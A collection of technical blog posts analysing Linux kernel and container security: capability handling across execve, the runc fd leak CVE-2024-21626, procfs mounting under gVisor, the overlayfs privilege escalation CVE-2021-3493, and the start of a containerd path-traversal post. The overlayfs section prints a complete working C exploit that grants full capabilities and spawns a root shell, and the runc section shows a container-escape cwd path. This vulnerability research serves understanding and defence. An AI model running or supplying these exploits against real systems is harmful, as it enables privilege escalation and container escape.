            Thread 2 (PID: 1820, TID: 1822) is spawning a child process...
            Child process of Thread 1 (PID: 1, TID: 1) exiting to activate PID namespace.
            Child process of Thread 2 (PID: 1824, TID: 1824) is starting to sleep for 20 seconds...
            Child process of Thread 2 (PID: 1824, TID: 1824) has finished sleeping.
            Main process (PID: 1820, TID: 1820) has finished executing.

As we can see only the first thread’s child in the new PID namespace. So we can unshare PID namespace in one thread and only this thread’s child process will in the new PID namespace.

Linux process capability change through execve syscall

2024-02-24T00:00:00+00:00

The issue

I have encountered an interesting issue about capability change through execve syscall. Once we drop current process’s capability, then execve another program, the new program get the dropped capability again. Following poc shows this.

            package main
            import (
                    "os"
                    "time"
                    goruntime "runtime"
                    "os/exec"
                    "syscall"
                    "github.com/syndtr/gocapability/capability"
            )
            func main() {
                    cap1, _ := capability.NewPid(os.Getpid())
                    goruntime.LockOSThread()
                    defer goruntime.UnlockOSThread()
                    cap1.Unset(capability.EFFECTIVE, 2)
                    cap1.Unset(capability.PERMITTED, 2)
                    cap1.Unset(capability.INHERITABLE, 2)
                    cap1.Unset(capability.BOUNDING, 2)
                    cap1.Unset(capability.AMBIENT, 2)
                    cap1.Apply(capability.CAPS)
                    time.Sleep(20 * time.Second)
                    binary, lookErr := exec.LookPath("bash")
                    if lookErr != nil {
                            panic(lookErr)
                    }
                    args := []string{"bash"}
                    env := os.Environ()
                    execErr := syscall.Exec(binary, args, env)
                    if execErr != nil {
                            panic(execErr)
                    }
            }

During the Sleep, we see the process has following cap:

After execve, we see the same process has following cap:

This means we don’t drop capability in new program.

The solution

It first shocks me. But after quick thought I found the reason: we don’t fork. The child process will inherit the parent’s capability, but if no fork the execve will have his own logic for capability in this case, it has full capability. The quick solution is to use fork+execve, but our scenario here can’t use fork for some reason. After some time thought, I suddenly remember that the Linux has a process attribute named ‘no_new_privs’. The ‘no_new_privs’ document says:

With no_new_privs set, execve promises not to grant the privilege to do anything that could not have been done without the execve call.

But amost all of the document is about suid, no capability. Then I try following code, add Prctl(unix.PR_SET_NO_NEW_PRIVS) after drop capability then do execve syscall.

            package main
            import (
                    "fmt"
                    "os"
                    "time"
                    goruntime "runtime"
                    "os/exec"
                    "syscall"
                    "github.com/syndtr/gocapability/capability"
                    "golang.org/x/sys/unix"
            )
            func main() {
                    cap1, _ := capability.NewPid(os.Getpid())
                    goruntime.LockOSThread()
                    defer goruntime.UnlockOSThread()
                    cap1.Unset(capability.EFFECTIVE, 2)
                    cap1.Unset(capability.PERMITTED, 2)
                    cap1.Unset(capability.INHERITABLE, 2)
                    cap1.Unset(capability.BOUNDING, 2)
                    cap1.Unset(capability.AMBIENT, 2)
                    cap1.Apply(capability.CAPS)
                    if err := unix.Prctl(unix.PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0); err != nil {
                            fmt.Println("set new privs error")
                    }
                    time.Sleep(20 * time.Second)
                    binary, lookErr := exec.LookPath("bash")
                    if lookErr != nil {
                            panic(lookErr)
                    }
                    args := []string{"bash"}
                    env := os.Environ()
                    execErr := syscall.Exec(binary, args, env)
                    if execErr != nil {
                            panic(execErr)
                    }
            }

After execve, I see the following process capability, as we can see it works.

The internals

When execve detects that the current process has been set no_new_privs, it will add ‘LSM_UNSAFE_NO_NEW_PRIVS’ flag to ‘bprm->unsafe’ in ‘check_unsafe_exec’ function in fs/exec.c file.

            static void check_unsafe_exec(struct linux_binprm *bprm)
            {
                    struct task_struct *p = current, 
            t;
                    unsigned n_fs;
            ...
                    /
                    * This isn't strictly necessary, but it makes it harder for LSMs to
                    * mess up.
                    */
                    if (task_no_new_privs(current))
                            bprm->unsafe |= LSM_UNSAFE_NO_NEW_PRIVS;
            ...
            }

Later in ‘cap_bprm_creds_from_file’ function in security/commoncap.c it will check ‘bprm->unsafe & ~LSM_UNSAFE_PTRACE’.

            int cap_bprm_creds_from_file(struct linux_binprm *bprm, struct file *file)
            {
                    ...
                    /* Don't let someone trace a set[ug]id/setpcap binary with the revised
                    * credentials unless they have the appropriate permit.
                    *
                    * In addition, if NO_NEW_PRIVS, then ensure we get no new privs.
                    */
                    is_setid = __is_setuid(new, old) || __is_setgid(new, old);
                    if ((is_setid || __cap_gained(permitted, new, old)) &&
                    ((bprm->unsafe & ~LSM_UNSAFE_PTRACE) ||
                    !ptracer_capable(current, new->user_ns))) {
                            /* downgrade; they get no more than they had, and maybe less */
                            if (!ns_capable(new->user_ns, CAP_SETUID) ||
                            (bprm->unsafe & LSM_UNSAFE_NO_NEW_PRIVS)) {
                                    new->euid = new->uid;
                                    new->egid = new->gid;
                            }
                            new->cap_permitted = cap_intersect(new->cap_permitted,
                                                            old->cap_permitted);
                    }
                    ...
            }

If this is true, it will caculate the new cap_permitted using ‘cap_intersect’

            new->cap_permitted = cap_intersect(new->cap_permitted,
                                                            old->cap_permitted);

In this way the current process cap which has been dropped affects the new execve process.

Why Golang eat my fd 3 in child process

2024-02-03T00:00:00+00:00

Recently I analyzed the runc vulnerability CVE-2024-21626. The root cause of this vulnerability is that a cgroup fd is leaked to ‘runc init’ process. While digging into the root cause, I found something interesting of Golang’s fd inheritance. This post describes the founding in detail. First we need have a look at CVE-2024-21626.

CVE-2024-21626 analysis

runc double clone process

While creating the container environment, runc uses double clone method to do the complicated separated things. Following pic shows the process.

runc first start runc[0:PARNET] process, the runc[0:PARENT] will clone a runc[1:CHILD] process, runc[1:CHILD] process will clone runc[2:INIT] process and finally the runc[2:INIT] process will execute the specified process in OCI configuration.

runc fd leak vulnerability

runc[2:INIT] will do the final work such as prepare the rootfs and change to rootfs, find the executable before executing the container process. In this process, the fd can be leaked to container process. As the fd is point to a file in the host filesystem if the container process can see this fd, it can break out container environment by leveraging this fd. runc has several this kind of vulnreability in history, the most famous is CVE-2019-5736. The root cause of CVE-2019-5736 is that the container process can see /proc/self/exe which is point to the host runc binary. Following pic(from https://blog.wohin.me/posts/hack-runc-elf-inject/) show the root cause of CVE-2019-5736 and how to exploit it.

CVE-2024-21626

The root cause of this vulnerability is that a fd point /sys/fs/cgroup directory is leaked to runc init process. The leak happens here in file libcontainer/cgroups/file.go:

            func prepareOpenat2() error {
                    prepOnce.Do(func() {
                            fd, err := unix.Openat2(-1, cgroupfsDir, &unix.OpenHow{
                                    Flags: unix.O_DIRECTORY | unix.O_PATH, // no unix.O_CLOEXEC flag
                            })
            ...

The unix.Openat2 is used to open the cgroupfsDir(/sys/fs/cgroup) without unix.O_CLOEXEC flag set. After runc init execve the container process this fd will not be closed thus leaked to the container process. When we add a Sleep code in runc init, we can see following:

As we can see the fd 7 point to the /sys/fs/cgroup. We can set the ‘cwd’ in OCI config to ‘/proc/self/fd/7/../../../../’, when the container process runs, our current working directory will point to the host rootfs. Using following ‘args’ and ‘cwd’ to run a container

            "args": [
                    "cat", "hostfile"
            ],
            ...
            "cwd": "/proc/self/fd/7/../../../../",

We can see the container process read the file success.

It seems not difficult to understand this vulnerability. But while reading the fix patches, I found something interesting. The first is after apply the backported commit 937ca107c3d22da77eb8e8030f2342253b980980 I can’t see the fd leak. And also I see this words

    In practice, on runc 1.1 this does leak to "runc init" but on main the
    handle has a low enough file descriptor that it gets clobbered by the
    ForkExec of "runc init".

I want to know how it gets ‘clobbered’. And in cgroup v2 this issue is doesn’t exist. runc exec doesn’t trigger this issue. In summary there are several issues that have been attracted my attention.

Why the main branch doesn’t affected by this CVE
Why cgroup v2 doesn’t doesn’t affected by this CVE
Why the first patch mitigates this CVE
Why ‘run exec’ doesn’t trigger this CVE

I decided to dig into this issue.

The fd inheritance in Golang cmd Run

First of all, I need to find out the fd inheritance about the os.Open and syscall.Openat2 as the first one related to commit 937ca107c3d22da77eb8e8030f2342253b980980 and the second related to the fd leak. I write two simple program, the first is ‘wait’, it is just used to be launched by another program ‘test’. After the start wait, we can see the fd status of these two process.

            //wait
            package main
            import "time"
            func main() {
            time.Sleep(20 * time.Second)
            }

os.Open fd

Using following ‘test’:

    os.Open("/home/test")
    cmd := exec.Command("/home/test/go/src/test/wait")
    cmd.Run()

cmd.Run uses ForkExecve to start a new process. As we can see, the child process (runc init) doesn’t inherit the fd opend by os.Open. This is because that os.Open adds the O_CLOEXEC, so every file opened by os.Open will be closed after execve. The source code can be found here:

            func openFileNolog(name string, flag int, perm FileMode) (*File, error) {
                    ...
                    var r int
                    var s poll.SysFile
                    for {
                            var e error
                            r, s, e = open(name, flag|syscall.O_CLOEXEC, syscallMode(perm))
            ...

syscall.Openat2 fd

Let’s see the behaviour of syscall.Openat2. Use following ‘test’:

    unix.Openat2(-1, "/sys/fs/cgroup", &unix.OpenHow{
                            Flags: unix.O_DIRECTORY | unix.O_PATH})

    cmd := exec.Command("/home/test/go/src/test/wait")
    cmd.Run()

As we can see the “/sys/fs/cgroup” fd in the child process.

So the fd opened by ‘unix.Openat2’ will not be closed after ForkExecve.

The magick

When I just apply the commit 937ca107c3d22da77eb8e8030f2342253b980980 the interesting things happen. Though the ‘runc runc’ has a fd point to ‘/sys/fs/cgroup’ the ‘runc init’ has no this fd. The cgroupfd in ‘ tryDefaultCgroupRoot’ function will be closed after apply the 937c commit. So the ‘runc run’ fd 3 is the fd in ‘prepareOpenat2’ function.

But as we can see in our previous test, the fd opend by ‘syscall.Openat2’ will be inherited by child process. We don’t see the fd in child process. What’s wrong? After I navigating the runc code and do some experiment I found the most different between the ‘runc’ start a new process with my test is that in the runc case before it call cmd.Run it also set cmd.ExtraFiles. Let’s do the following test.

    unix.Openat2(-1, "/sys/fs/cgroup", &unix.OpenHow{
                            Flags: unix.O_DIRECTORY | unix.O_PATH})

    cmd := exec.Command("/home/test/go/src/test/wait")
    cmd.SysProcAttr = &unix.SysProcAttr{}
    pipeRead, pipeWrite, _ := os.Pipe()
    defer pipeRead.Close()
    defer pipeWrite.Close()

    cmd.ExtraFiles = []*os.File{pipeWrite}
    cmd.Run()

Following is the fd of parent and child process.

We have reproduced the issue, the fd 3 is eaten by Golang after cmd.Run if we add cmd.ExtraFiles. What if we open two fd by unix.Openat2?

    unix.Openat2(-1, "/sys/fs/cgroup", &unix.OpenHow{
                            Flags: unix.O_DIRECTORY | unix.O_PATH})
    unix.Openat2(-1, "/home/test", &unix.OpenHow{
                            Flags: unix.O_DIRECTORY | unix.O_PATH})
    cmd := exec.Command("/home/test/go/src/test/wait")
    cmd.SysProcAttr = &unix.SysProcAttr{}
    pipeRead, pipeWrite, _ := os.Pipe()
    defer pipeRead.Close()
    defer pipeWrite.Close()
    cmd.ExtraFiles = []*os.File{pipeWrite}
    cmd.Run()

As we can see only the fd 3 is eaten.

After read the go source and document, I found following words in https://pkg.go.dev/os/exec.

ExtraFiles is used to specify the open files to be inherited by the child process. and entry i becomes file descriptor 3+i as the first three is standard input/output/error. If we add two ExtraFiles we can see our fd 4 is also eaten.

Now it’s clear that the cmd.ExtraFiles will be guaranteed to be seen in child process. And it may overwrites the fds inherited from parent.

Conclusion

About the CVE-2024-21626

After the investigation, we can now have the full picture of CVE-2024-21626. The root cause of this CVE is that a cgroupfd is leaked to ‘runc init’. This cgroupfd is opend in prepareOpenat2 using syscall.Openat2 without O_CLOEXEC flag set. So this fd is leaked to ‘runc init’. The main branch is not affected because it has commit 937ca107c3d22da77eb8e8030f2342253b980980. This commit close another opened cgroupfd in time. So the prepareOpenat2 fd open will hold the fd 3. and it is low enough it will be clobbered by cmd.Run(forkExecve). The cgroup v2 is not affected is that tryDefaultCgroupRoot open cgroupfd only in cgroup v1, so even it has no commit 937c the prepareOpenat2 fd will be 3. The ‘run exec’ doesn’t trigger this CVE is because the tryDefaultCgroupRoot will only be called in ‘runc init’ process not in ‘runc exec’ so the prepareOpenat2 fd will be 3.

Golang fd inheritance after cmd Run

Three things get from this CVE.

os.Open fd will automatically closed as Golang adds O_CLOEXEC implicitly
syscall.Openat2 fd will not be closed automatically and will be inherited by child process even this is unwanted
Golang only guarantees that the cmd.ExtraFiles will be inherited by child process and it may destroy the unwanted inherited fd.

Ref

The runc internals(written by myself): https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/28/runc-internals-3

mount procfs in unprivileged container

2023-12-29T00:00:00+00:00

Background

gVisor is an application kernel that implements a substantial portion of the Linux system surface. gVisor is mostly used in cloud native as it implements an OCI runtime runsc. runsc uses the application kernel which is named Sentry to run the user’s application. By this mean, the application doesn’t share the same kernel with the host like what runc does which largely reduce the attack surface in container ecosystem.

gVisor is quite interesting that it rewrites the Linux syscall interface. The foundation of gVisor is system call interception. gVisor has three means of system call interception, ptrace, kvm and systrap. gVisor uses these interception means to intercept the user’s application syscall and reimplements it in Sentry.

Though gVisor is used mostly in cloud native ecosystem, it is useful in process-level sandbox. I have designed a process-level sandbox based gVisor to sandbox the dangerous third party program.

Recently I encounter a problem that run gVisor in unprivileged container like docker or podman. When I run gVisor in docker it returns an EPERM error code. Following shows the error.

            # docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined   ubuntu
            root@21adbdee0c6d:/# cd /tmp
            root@21adbdee0c6d:/tmp# ./runsc  -rootless --debug --debug-log=/tmp/log/ do ls
            *** Warning: sandbox network isn't supported with --rootless, switching to host ***
            creating container: cannot create sandbox: cannot read client sync file: waiting for sandbox to start: EOF
            root@21adbdee0c6d:/tmp# cd log/
            root@21adbdee0c6d:/tmp/log# ls
            ...
            W1227 04:54:24.366822       1 specutils.go:124] noNewPrivileges ignored. PR_SET_NO_NEW_PRIVS is assumed to always be set.
            W1227 04:54:24.366995       1 util.go:64] FATAL ERROR: error mounting proc: operation not permitted
            error mounting proc: operation not permitted
            root@21adbdee0c6d:/tmp/log#

After navigating the code, I found the error occurs in mount procfs. The error is that mount procfs in docker container return EPERM.

Analysis

The mount syscall has several point to return EPERM. We need find which point it is that cause our gVisor failed.

I used following method. First patch the gVisor to add sleep code before the mount procfs error. Then we run runsc. The gofer process(which the mount failed occurs) will sleep. We uses trace-cmd to trace the gofer process’ kernel function call.

            trace-cmd record -P <goferpid> function_graph

After look at the trace output, I find the suspicious function.

            |      security_sb_kern_mount();
            |      mount_too_revealing() {
            |        down_read() {
            |          __cond_resched();
            |        }
            |        _raw_spin_lock();
            |        _raw_spin_unlock();
            |        up_read();
            |      }
            |      fc_drop_locked() {

From the code we can found the ‘mount_too_revealing’ return true and should be responsible for our EPERM. ‘mount_too_revealing’ calls ‘mnt_already_visible’ to do the decision. As my previous blog said:

‘mnt_already_visible’ will iterate the new mount namespace and check whether it has child mountpoint. If it has child mountpoint, it is not fully visible to this mount namespace so the procfs will not be mounted. This reason is as following. The procfs and sysfs contains some global data, so the container should not touch. So mouting procfs and sysfs in new user namespace should be restricted. Anyway, if we allow this, we can mount the whole procfs data in new user namespace. In docker and runc environment, it has ‘maskedPaths’ which means the path should be masked in container.

Also I find there an old discuss in runc issue. The reason is just as I said. But Alban Crequy gives two solutions.

by add ‘-v /proc:/newproc’ in the docker command, thus the runsc can see the full procfs, so there will be no EPERM

         # docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined -v /proc:/newproc ubuntu root@0723fa9d5c92:/# cd /tmp/
         root@0723fa9d5c92:/tmp# ls
         runsc
         root@0723fa9d5c92:/tmp# ./runsc  --rootless do ls
         *** Warning: sandbox network isn't supported with --rootless, switching to host ***
         runsc  runsc-do1613356723
         root@0723fa9d5c92:/tmp#

by first create a dead pidns, then mount this procfs to docker container

         # unshare -p -f mount -t proc proc /mnt/proc
         # docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined -v /mnt/proc:/newproc ubuntu
         root@eda100eadf1f:/# cd /tmp
         root@eda100eadf1f:/tmp# ./runsc  --rootless do ls
         *** Warning: sandbox network isn't supported with --rootless, switching to host ***
         runsc  runsc-do1925241706
         root@eda100eadf1f:/tmp#

Both two solutions is not very elegant. Luckily runsc here doesn’t need mount a whole procfs, it just need to open /proc/self/fd and read some generic files. Andrei Vagin has prepare a patch to address this issue, without any tricks. It binds mount current /proc instead of mounting a new procfs instance.

Conclude

mount syscall needs CAP_SYS_ADMIN. unprivileged user can get CAP_SYS_ADMIN in new user ns. Some filesystem can be mounted in new user ns by specifying the ‘FS_USERNS_MOUNT’ flag.
procfs and sysfs can be mounted in new user ns. But if there are child mounts in procfs and sysfs the mount syscall will return EPERM.

Not all filesystem can be mounted in non-root user namespace. There is a permission check in mount syscall.

Ref

gVisor issue: https://github.com/google/gvisor/issues/8205
runc issue: https://github.com/opencontainers/runc/issues/1658

CVE-2021-3493 Ubuntu overlayfs privilege escalation vulnerability analysis

2022-09-12T00:00:00+00:00

CVE-2021-3493 is a logic vulnerability in overlayfs filesystem, with a change of Ubuntu, it can be exploited to do privilege escalation. This post introduce the background, the root cause and the fix of this vulnerability.

Overlayfs

Overlayfs is a kind of filesystem that combines one upper layer directory tree and several lower layers directory tree to one filesystem. The upper layer directory is mounted read-write and the lower layers is mounted read-only. The filesystem operations of overlayfs always goes to the upper layer and lower layer. Following pic show the basic concepts of overlayfs(from this post).

Following pic show a basic usage of overlayfs.

As we can see, when creating a file that doesn’t exist in upper or layer directry, the file will be created in the upper directory even after the overlayfs is umounted. Not only the create operations, most of(if not all) the file operations will be redirected to the upper or lower directory thus leading the corresponding filesystem operations to be called. Les’t see the creation process.

The ‘ovl_new_inode’ will create the inode of overlayfs layer, and the ‘vfs_create’ will create the file in the upper layer directory, this is the ‘real’ file. Let’s see another function call chain with the vulnerability setxattr.

Notice we can see again the double ‘vfs_setxattr’ calls, the first is for overlayfs layer and the second is for the upper directory file, the real file. Notice before the first ‘vfs_setxattr’ call, the ‘cap_convert_nscap’ has been called, but the second not. This is the key point of this vulnerability.

This is the backgroud of overlayfs for understanding this vulnerability. Overlayfs is used in container widely.

Capabilities

Linux capabilities divides the privileges traditionally associated with superuser into distinct units. In order to assign the capabilities to process, the binary file can be assigned with capabilities. The example is ‘ping’ binary. ‘ping’ process needs to construct raw sockets which needs cap_net_raw capablility. In order to let the unprivileged user to use ‘ping’ binary, the ‘ping’ binary needs to be assigned ‘cap_net_admin’.

The binary capabilities is assgned by ‘extend attributes’. Following pic shows the ‘ping’ binary case.

If the binary has been set capabilities, the ‘security.capability’ has a related value. If not, there is no this file extend attributes, such as ‘ls’ binary.

When the binary which has ‘capabilities’ been executed. The kernel will assign the capabilities to the process. This is alike ‘suid’ binary but the ‘suid’ bit is set in the file attributes in inode(if I remember correctly). Following pic shows the ‘su’ binary has no ‘security.capability’ extend attribute.

struct cred stores the capabilities of process.

            struct cred {
                    ...
                    unsigned	securebits;	/* SUID-less security management */
                    kernel_cap_t	cap_inheritable; /* caps our children can inherit */
                    kernel_cap_t	cap_permitted;	/* caps we're permitted */
                    kernel_cap_t	cap_effective;	/* caps we can actually use */
                    kernel_cap_t	cap_bset;	/* capability bounding set */
                    kernel_cap_t	cap_ambient;	/* Ambient capability set */
            ...
            } __randomize_layout;

Here the several cap is not the topic of this post. ‘cap_effective’ is used to do the capabilitiy permission check. When the binary has file capabilities setting, the ‘get_vfs_caps_from_disk’ will be called to get the binary file in the ‘execve’ syscall, then ‘bprm_caps_from_vfs_caps’ will be called to set the ‘cred’s cap_permitted.

Mount filesystem in new user namespace

Not all filesystem can be mounted in non-root user namespace. There is a permission check in mount syscall.

If the filesystem’s fs_flags has no FS_USERNS_MOUNT set, this means the init user ns will be used to check the CAP_SYS_ADMIN capabilities. Otherwise, the ‘fc->user_ns’ will be used. For new mount, the ‘fc->user_ns’ is set to the current process’s user ns.

There are just a little filesystem that sets ‘FS_USERNS_MOUNT’, it’s procfs, sysfs, ramfs, tmpfs and so on, only them can be mounted in non-root user namespace.

Notice, when mount syscall is handled, there is also a check whether the mount namespace’s user ns has the CAP_SYS_ADMIN.

The vulnerability

This vulnerabilitiy is Ubuntu-specific. The overlayfs can’t be mounted in non-root usernamespace in mainline upstream Linux kernel, but Ubuntu changed this behaviour as it added ‘FS_USERNS_MOUNT’ to the overlayfs filesystem. The upstream ‘ovl_fs_type’ definition.

The Ubuntu ‘ovl_fs_type’ from here.

But there is also an upstream bug that with Ubuntu’s change make the bug exploitable, to be a vulnerability. Let’s recap the setxattr call chain.

While the userspace triggers a setxattr syscall for the overlayfs file, it calls ‘cap_convert_nscap’. When the size indicates this is a cap v2 format, ‘cap_convert_nscap’ calls ‘ns_capable’ to check the permission.

Here ‘cap_convert_nscap’ checks whether the ‘inode->i_sb->s_user_ns’ user ns has the ‘CAP_SETFCAP’ capability.

            ns_capable(inode->i_sb->s_user_ns, CAP_SETFCAP))

The ‘inode->i_sb->s_user_ns’ is assignge by the following call chain.

            ovl_mount
            -->mount_nodev
            -->sget
                    -->alloc_super

            struct super_block *sget(struct file_system_type *type,
                                    int (*test)(struct super_block *,void *),
                                    int (*set)(struct super_block *,void *),
                                    int flags,
                                    void *data)
            {
                    struct user_namespace *user_ns = current_user_ns();
                    ...
                    if (!s) {
                            spin_unlock(&sb_lock);
                            s = alloc_super(type, (flags & ~SB_SUBMOUNT), user_ns);
                            if (!s)
                                    return ERR_PTR(-ENOMEM);
                            goto retry;
                    }
            ...
            }

            static struct super_block *alloc_super(struct file_system_type *type, int flags,
                                            struct user_namespace *user_ns)
            {
                    struct super_block *s = kzalloc(sizeof(struct super_block),  GFP_USER);
                    static const struct super_operations default_op;
                    int i;

                    if (!s)
                            return NULL;

                    INIT_LIST_HEAD(&s->s_mounts);
                    s->s_user_ns = get_user_ns(user_ns);
            }

As we can see the ‘s->s_user_ns’ is initialized from the process of ‘mount’ which in the exploit is a new user ns which has has full capabilities. Here this ‘inode’ is the inode which overlayfs create, its superblock’s s_user_ns is a new user ns. And a new user ns has all of the CAP_SETFCAP. So here ‘ns_capable’ will return 0 which means the process has the ‘CAP_SETFCAP’ in this new user ns.

Return to the call chain of setxattr syscall, after ‘cap_convert_nscap’ check permission passed, the ‘vfs_setxattr’ is called first time. Notice, the first time of calling ‘vfs_setxattr’ is using the overlayfs layer’s dentry. Then goes to the upper dir’s ‘vfs_setxattr’, as the upperdir is a directory in the host filesystem (ext4), so the ext4 filesystem’s setxattr(ext4_xattr_set) will be called and finally the extend attributes will be written to the upperdir file.

Exploit

Following exploit is copied from the ssd-disclosure.

            #define _GNU_SOURCE
            #include <stdio.h>
            #include <stdlib.h>
            #include <string.h>
            #include <unistd.h>
            #include <fcntl.h>
            #include <err.h>
            #include <errno.h>
            #include <sched.h>
            #include <sys/types.h>
            #include <sys/stat.h>
            #include <sys/wait.h>
            #include <sys/mount.h>

            //#include <attr/xattr.h>
            //#include <sys/xattr.h>
            int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);


            #define DIR_BASE    "./ovlcap"
            #define DIR_WORK    DIR_BASE "/work"
            #define DIR_LOWER   DIR_BASE "/lower"
            #define DIR_UPPER   DIR_BASE "/upper"
            #define DIR_MERGE   DIR_BASE "/merge"
            #define BIN_MERGE   DIR_MERGE "/magic"
            #define BIN_UPPER   DIR_UPPER "/magic"


            static void xmkdir(const char *path, mode_t mode)
            {
            if (mkdir(path, mode) == -1 && errno != EEXIST)
                    err(1, "mkdir %s", path);
            }

            static void xwritefile(const char *path, const char *data)
            {
            int fd = open(path, O_WRONLY);
            if (fd == -1)
                    err(1, "open %s", path);
            ssize_t len = (ssize_t) strlen(data);
            if (write(fd, data, len) != len)
                    err(1, "write %s", path);
            close(fd);
            }

            static void xcopyfile(const char *src, const char *dst, mode_t mode)
            {
            int fi, fo;

            if ((fi = open(src, O_RDONLY)) == -1)
                    err(1, "open %s", src);
            if ((fo = open(dst, O_WRONLY | O_CREAT, mode)) == -1)
                    err(1, "open %s", dst);

            char buf[4096];
            ssize_t rd, wr;

            for (;;) {
                    rd = read(fi, buf, sizeof(buf));
                    if (rd == 0) {
                    break;
                    } else if (rd == -1) {
                    if (errno == EINTR)
                            continue;
                    err(1, "read %s", src);
                    }

                    char *p = buf;
                    while (rd > 0) {
                    wr = write(fo, p, rd);
                    if (wr == -1) {
                            if (errno == EINTR)
                            continue;
                            err(1, "write %s", dst);
                    }
                    p += wr;
                    rd -= wr;
                    }
            }

            close(fi);
            close(fo);
            }

            static int exploit()
            {
            char buf[4096];

            sprintf(buf, "rm -rf '%s/'", DIR_BASE);
            system(buf);

            xmkdir(DIR_BASE, 0777);
            xmkdir(DIR_WORK,  0777);
            xmkdir(DIR_LOWER, 0777);
            xmkdir(DIR_UPPER, 0777);
            xmkdir(DIR_MERGE, 0777);

            uid_t uid = getuid();
            gid_t gid = getgid();

            if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)
                    err(1, "unshare");

            xwritefile("/proc/self/setgroups", "deny");

            sprintf(buf, "0 %d 1", uid);
            xwritefile("/proc/self/uid_map", buf);

            sprintf(buf, "0 %d 1", gid);
            xwritefile("/proc/self/gid_map", buf);

            sprintf(buf, "lowerdir=%s,upperdir=%s,workdir=%s", DIR_LOWER, DIR_UPPER, DIR_WORK);
            if (mount("overlay", DIR_MERGE, "overlay", 0, buf) == -1)
                    err(1, "mount %s", DIR_MERGE);

            // all+ep
            char cap[] = "\x01\x00\x00\x02\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00";

            xcopyfile("/proc/self/exe", BIN_MERGE, 0777);
            if (setxattr(BIN_MERGE, "security.capability", cap, sizeof(cap) - 1, 0) == -1)
                    err(1, "setxattr %s", BIN_MERGE);

            return 0;
            }

            int main(int argc, char *argv[])
            {
            if (strstr(argv[0], "magic") || (argc > 1 && !strcmp(argv[1], "shell"))) {
                    setuid(0);
                    setgid(0);
                    execl("/bin/bash", "/bin/bash", "--norc", "--noprofile", "-i", NULL);
                    err(1, "execl /bin/bash");
            }

            pid_t child = fork();
            if (child == -1)
                    err(1, "fork");

            if (child == 0) {
                    _exit(exploit());
            } else {
                    waitpid(child, NULL, 0);
            }

            execl(BIN_UPPER, BIN_UPPER, "shell", NULL);
            err(1, "execl %s", BIN_UPPER);
            }

The exploit works as follows:

create a child process
child: create the lowerdir, upperdir, workdir, mergedir
child: unshare to create a new mount ns and user ns, and write the uid_map and gid_map file for new user ns
child: mount overlayfs in new user ns this only works in Ubuntu as the Ubunu has a change for overlayfs
child: copy the exploit binary to merge directory, this will actually create a new file in upperdir
child: setxattr to set the exploit binary in merge dir, this will finally set the file’s xattr in upperdir as the second of ‘vfs_setxattr’ will set the file’s capabilities directly
parent: execute the exploit binary in upperdir with ‘shell’ argument
parent: setuid(0), setgid(0) and then execute a bash. As the exploit in upperdir binary has all capabilities, the setuid(0) will success

The fix

The fix is in this commit. The change is to move the ‘cap_convert_nscap’ permission check to ‘vfs_setxattr’ from ‘setxattr’. Thus the second call of ‘vfs_setxattr’ with the ext4’s filesystem dentry will also be checked by ‘cap_convert_nscap’. Because the ext4’s super inode’s user ns is the init user ns and the process has no ‘CAP_SETFCAP’ in this user ns so the check will not be passed. Thus the exploit can’t work any more.

containerd CVE-2022-23648: path traversal never die

2022-03-26T00:00:00+00:00

The spec

Path traversal is a classical kind of security issue in computer world. This is logical issue so even with the rapid development of technology, this kind of issue still appear in software. This post try to analysis a path traversal issue in containerd which is discovered by Felix Wilhelm. The first part let’s try to explain the related spec so that we can know what the function is and what the violation the implementation has.

Container has a concept of volume. If a container has no volume, the data we changed in container will disappear after the container is destroyed. In order to save data persistently or share data between containers, container came up with the concept of volume. A volume is often(if not all) implemented using bind mount. We can use -v in docker to add a volume.

            root@ubuntu:/home/test/CVE-2022-23648# mkdir test
            root@ubuntu:/home/test/CVE-2022-23648# echo "data in host" > test/aaa
            root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm  -v /home/test/CVE-2022-23648/test:/test ubuntu bash
            root@c201b6a39be2:/# mount | grep test
            /dev/sda5 on /test type ext4 (rw,relatime,errors=remount-ro)
            root@ecc59c1f5bc4:/# ls /test/
            aaa
            root@ecc59c1f5bc4:/# cat /test/aaa 
            data in host
            root@ecc59c1f5bc4:/# echo "data in guest" >> /test/aaa
            root@ecc59c1f5bc4:/# exit
            exit
            root@ubuntu:/home/test/CVE-2022-23648# cat test/aaa 
            data in host
            data in guest

‘docker inspect containerid’ in the host will show the data in “Mounts”.

            "Mounts": [
            {
                    "Type": "bind",
                    "Source": "/home/test/CVE-2022-23648/test",
                    "Destination": "/test",
                    "Mode": "",
                    "RW": true,
                    "Propagation": "rprivate"
            }
            ],

The OCI image spec also has a field named ‘Volumes’. The definition says it is ‘A set of directories describing where the process is likely to write data specific to a container instance’.

Let’s try to test this feature. First create a Dockerfile.

            from ubuntu:20.04

            VOLUME /volume-test/

Build it and start a container. We can see there is a mount in the container.

            root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test .
            Sending build context to Docker daemon  3.584kB
            Step 1/2 : from ubuntu:20.04
            ---> ff0fea8310f3
            Step 2/2 : VOLUME /volume-test/
            ---> Running in 2b744c0f90ff
            Removing intermediate container 2b744c0f90ff
            ---> 1cf01e39ec82
            Successfully built 1cf01e39ec82
            Successfully tagged volume-test:latest
            root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test bash
            root@a301238d982c:/# ls -lh /volume-test/
            total 0
            root@a301238d982c:/# mount | grep volume     
            /dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)

The ‘docker inspect’ shows the mount inforamtion as following.

            "Mounts": [
            {
                    "Type": "volume",
                    "Name": "e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98",
                    "Source": "/var/lib/docker/volumes/e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98/_data",
                    "Destination": "/volume-test",
                    "Driver": "local",
                    "Mode": "",
                    "RW": true,
                    "Propagation": ""
            }
            ],

The ‘docker image inspect’ show the following info:

            "Volumes": {
                    "/volume-test/": {}
            },

As we can see the ‘Source’ is generated by the runtime ifself and the ‘Destination’ is the name of VOLUME.

